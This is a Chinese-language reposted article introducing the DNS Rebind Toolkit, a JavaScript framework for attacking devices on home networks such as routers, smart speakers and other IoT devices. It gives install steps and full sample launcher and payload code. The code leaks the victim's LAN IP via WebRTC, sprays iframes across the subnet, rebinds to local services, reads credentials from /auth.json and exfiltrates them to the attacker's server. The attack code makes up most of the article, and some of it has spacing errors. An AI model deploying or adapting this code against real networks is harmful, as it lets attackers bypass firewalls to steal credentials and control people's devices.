分享一款用于创建DNS重绑定攻击的前端JavaScript工具包

Posted EMLab攻防实验室

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了分享一款用于创建DNS重绑定攻击的前端JavaScript工具包相关的知识,希望对你有一定的参考价值。

注意:本软件仅适用于教育目的,请不要将其用于非法活动,工具作者和本站对用户个人行为不负任何责任。

今天给大家介绍的是一款名叫DNS Rebind Toolkit的工具包,这是一款前段javascript工具包,渗透测试人员可利用该工具来创建DNS重绑定攻击。



工具介绍

DNSRebind Toolkit是一款前端JavaScript框架,可用于对存在漏洞的主机或本地局域网服务进行DNS重绑定攻击,类似的服务包括Google Home、Roku、SonosWiFi扬声器、WiFi路由器、智能恒温器以及其他的物联网设备。在这款工具的帮助下,远程攻击者可绕过路由器的防火墙,然后直接与目标用户家庭网络内的设备进行交互,并提取出隐私信息,在某些情况下他们甚至还可以直接控制目标设备。

值得一提的是,渗透测试人员可利用该工具包创建自己的DNS重绑定攻击,该工具包在payloads/目录下提供了多种可用于现实攻击的Payload。

工具安装

克隆项目源码:

git clone https://github.com/brannondorsey/dns-rebind-toolkit.git

cd dns-rebind-toolkit

安装依赖组件

npm install

运行服务器:

sudo node server

API及工具使用

该工具包提供了两种JavaScript对象,可用于配合创建DNS重绑定攻击:

1.    DNSRebindAttack:这个对象可以用来对包含漏洞的服务器进行攻击。它可以创建、管理并于多个DNSRebindNode对象进行通信,DNSRebindAttack所生成的每一个Payload都必须包含一个DNSRebindNode对象。

2.    DNSRebindNode:这个静态类对象需要包含在每一个html Payload文件中,它可以对目标主机所运行的服务进行攻击,并与相应的DNSRebindAttack对象进行通信。

在对有防火墙保护的LAN主机进行攻击时,这两个脚本需要配合使用,基本的攻击过程如下:

2.    目标用户点击了恶意链接,并访问了恶意页面,其中http://example.com/launcher.html嵌入在一个iframe里面,页面此时便会触发攻击执行。

使用样例

一次攻击需要三个脚本和文件协同合作:

1.    一个HTML文件,其中包含DNSRebindAttack实例(例如launcher.html)。

3.    一台DNS Rebind Toolkit服务器(server.js),用于传递文件并提取数据。

launcher.html

下面给出的是一个launcher.html文件样本,你可以在项目目录的examples/launcher.html中找到完整代码:

<!DOCTYPEhtml>

<head>

       <title>Examplelauncher</title>

</head>

<body>

    <!-- This script is a depency ofDNSRebindAttack.js and must be included -->

    <script type="text/javascript"src="/share/js/EventEmitter.js"></script>

    <!-- Include the DNS Rebind Attackobject -->

    <script type="text/javascript"src="/share/js/DNSRebindAttack.js"></script>

    <scripttype="text/javascript">

    // DNSRebindAttack has a static method thatuses WebRTC to leak the

       // browser's IP address on the LAN. We'lluse this to guess the LAN's IP

       // subnet. If the local IP is 192.168.1.89,we'll launch 255 iframes

       // targetting all IP addresses from192.168.1.1-255

       DNSRebindAttack.getLocalIPAddress()

       .then(ip => launchRebindAttack(ip))

       .catch(err => {

           console.error(err)

           // Looks like our nifty WebRTC leaktrick didn't work (doesn't work

           // in some browsers). No biggie, mosthome networks are 192.168.1.1/24

           launchRebindAttack('192.168.1.1')

       })

       function launchRebindAttack(localIp) {

           // convert 192.168.1.1 into array from192.168.1.0 - 192.168.1.255

           const first3Octets =localIp.substring(0, localIp.lastIndexOf('.'))

           const ips =[...Array(256).keys()].map(octet => `${first3Octets}.${octet}`)

           // The first argument is the domainname of a publicly accessible

           // whonow server(https://github.com/brannondorsey/whonow).

           // I've got one running on port 53 ofrebind.network you can to use.

           // The services you are attacking mightnot be running on port 80 so

           // you will probably want to changethat too.

           const rebind = newDNSRebindAttack('rebind.network', 80)

           // Launch a DNS Rebind attack, spawning255 iframes attacking the service

           // on each host of the subnet (or so wehope).

           // Arguments are:

           // 1) target ip addresses

           // 2) IP address your Node server.js is running on. Usually 127.0.0.1

           //    during dev, but then the publicly accessible IP (not hostname)

           //    of the VPS hosting this repo in production.

           // 3) the HTML payload to deliver to this service. This HTML file should

           //    have a DNSRebindNode instance implemented on in it.

           // 4) the interval in milliseconds to wait between each new iframe

           //    embed. Spawning 100 iframes at the same time can choke (or crash)

           //    a browser. The higher this value, the longer the attack takes,

           //    but the less resources it consumes.

           rebind.attack(ips, '127.0.0.1','examples/payload.html', 200)

           // rebind.nodes is also anEventEmitter, only this one is fired using

           // DNSRebindNode.emit(...). This allowsDNSRebindNodes inside of

           // iframes to post messages back to theparent DNSRebindAttack that

           // launched them. You can definecustome events by simply emitting

           //DNSRebindNode.emit('my-custom-event') and a listener in rebind.nodes

           // can receive it. That said, there area few standard event names that

           // get triggered automagically:

           // - begin: triggered when DNSRebindNode.js is loaded. This signifies

           //   that an attack has been launched (or at least, it's payload was

           //   delivered) against an IP address.

           // - rebind: the DNS rebind was successful, this node should now be

           //   communicating with the target service.

           // - exfiltrate: send JSON data back to your Node server.js and save

           //   it inside the data/ folder.

           // Additionally, theDNSRebindNode.destroy() static method

           // will trigger the 'destory' event andcause DNSRebindAttack to

           // remove the iframe.

           rebind.nodes.on('begin', (ip) => {

               // the DNSRebindNode has beenloaded, attacking ip

           })

           rebind.nodes.on('rebind', (ip) => {

               // the rebind was successful

               console.log('node rebind', ip)

           })

           rebind.nodes.on('exfiltrate', (ip,data) => {

               // JSON data was exfiltrated andsaved to the data/

               // folder on the remote machinehosting server.js

               console.log('node exfiltrate', ip,data)

               // data = {

               //     "username":"crashOverride",

               //     "password":"hacktheplanet!",

               // }

           })

       }

       </script>

   </body>

   </html>


payload.html

下面给出的是一个payload.html文件样本,你可以在项目目录的examples/ payload.html中找到完整代码:

<!DOCTYPEhtml>

<html>

<head>

    <title>Example Payload</title>

</head>

<body>

<!--

   Loadthe DNSRebindNode. This static class is used to launch the rebind

   attackand communicate with the DNSRebindAttack instance in example-launcher.html

   -->

<scripttype="text/javascript"src="/share/js/DNSRebindNode.js"></script>

<scripttype="text/javascript">

    attack()

    .then(() => {},

          err => {

              // there was an error at somepoint during the attack

                 console.error(err)

                 DNSRebindNode.emit('fatal', err.message)

             }

       ) // remove this iframe by callingdestroy()

       .then(() => DNSRebindNode.destroy())

       // launches the attack and returns apromise that is resolved if the target

       // service is found and correctlyexploited, or more likely, rejected because

       // this host doesn't exist, the targetservice isn't running, or something

       // went wrong with the exploit. Rememberthat this attack is being launched

       // against 255+ IP addresses, so most ofthem won't succeed.

       async function attack() {

           // DNSRebindNode has some default fetchoptions that specify things

           // like no caching, etc. You can re-usethem for convenience, or ignore

           // them and create your own options objectfor each fetch() request.

           // Here are their default values:

           // {

           //    method: "GET",

           //    headers: {

           //         // this doesn't work in all browsers.For instance,

          //         // Firefox doesn't letyou do this.

           //         "Origin": "", //unset the origin header

           //         "Pragma":"no-cache",

           //         "Cache-Control":"no-cache"

           //    },

           //    cache: "no-cache"

           // }

           const getOptions =DNSRebindNode.fetchOptions()

           try {

               // In this example, we'll pretendwe are attacking some service with

               // an /auth.json file withusername/password sitting in plaintext.

               // Before we swipe those creds, weneed to first perform the rebind

               // attack. Most likely, ourwebserver will cache the DNS results

               // for this page's host.DNSRebindNode.rebind(...) recursively

               // re-attempts to rebind the hostwith a new, target IP address.

               // This can take over a minute, andif it is unsuccessful the

               // promise is rejected.

               const opts = {

                   // these options get passed tothe DNS rebind fetch request

                   fetchOptions: getOptions,

                   // by default,DNSRebindNode.rebind() is considered successful

                   // if it receives an HTTP 200OK response from the target service.

                   // However, you can define anykind of "rebind success" scenario

                   // yourself with thesuccessPredicate(...) function. This

                   // function receives a fetchresult as a parameter and the return

                   // value determines if therebind was successful (i.e. you are

                   // communicating with thetarget server). Here we check to see

                   // if the fetchResult was sentby our example vulnerable server.

                   successPredicate: (fetchResult)=> {

                       return fetchResult.headers.get('Server')== 'Example Vulnerable Server v1.0'

                   }

               }

               // await the rebind. Can take up toover a minute depending on the

               // victim's DNS cache settings orif there is no host listening on

               // the other side.

               awaitDNSRebindNode.rebind(`http://${location.host}/auth.json`, opts)

           } catch (err) {

               // whoops, the rebind failed.Either the browser's DNS cache was

               // never cleared, or more likely,this service isn't running on the

               // target host. Oh well... Bubbleup the rejection and have our

               // attack()'s rejection handlerdeal w/ it.

               return Promise.reject(err)

           }

           try {

               // alrighty, now that we've reboundthe host and are communicating

               // with the target service, let'sgrab the credentials

               const creds = awaitfetch(`http://${location.host}/auth.json`)

                                   .then(res =>res.json())

                // {

                //     "username":"crashOverride",

                //     "password":"hacktheplanet!",

                // }

               // console.log(creds)

               // great, now let's exfiltratethose creds to the Node.js server

               // running this whole shebang. That's thelast thing we care about,

               // so we will just return thispromise as the result of attack()

               // and let its handler's deal withit.

               //

               // NOTE: the second argument toexfiltrate(...) must be JSON

               // serializable.

               returnDNSRebindNode.exfiltrate('auth-example', creds)

           } catch (err) {

               return Promise.reject(err)

           }

       }

   </script>

   </body>

   </html>

server.js

这个脚本用来传递launcher.html和payload.html文件,并负责接收和保存工具从目标主机中提取出的数据:

usage:server [-h] [-v] [-p PORT]

DNSRebind Toolkit server

Optionalarguments:

  -h, --help            Show this help message and exit.

     -v, --version         Show program's version number andexit.

     -p PORT, --port PORT  Which ports to bind the servers on. Mayinclude

                           multiple like: --port80 --port 1337 (default: -p 80

                           -p 8008 -p 8060 -p1337)

项目结构

1.    server.js:DNS Rebind Toolkit服务器;

2.    payloads/:包含了多种可直接使用的HTML Payload文件,可用于针对存在漏洞的物联网设备进行渗透测试;

3.    examples/:使用样例文件;

4.    data/:提取出的数据信息将保存在该目录下(方法:DNSRebindNode.exfiltrate(…));

5.    share/:存储了examples/和payload/目录中HTML文件共享的JavaScript文件;

* 参考来源:brannondorsey,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM



以上是关于分享一款用于创建DNS重绑定攻击的前端JavaScript工具包的主要内容,如果未能解决你的问题,请参考以下文章

一文搞懂│XSS攻击SQL注入CSRF攻击DDOS攻击DNS劫持

一文搞懂│XSS攻击SQL注入CSRF攻击DDOS攻击DNS劫持

一文搞懂│XSS攻击SQL注入CSRF攻击DDOS攻击DNS劫持

解析中间人攻击(2/4)---DNS欺骗

犯罪分子劫持路由器 DNS 设置将用户重定向至安卓恶意软件

攻防技术第一篇之-知彼(攻击手段)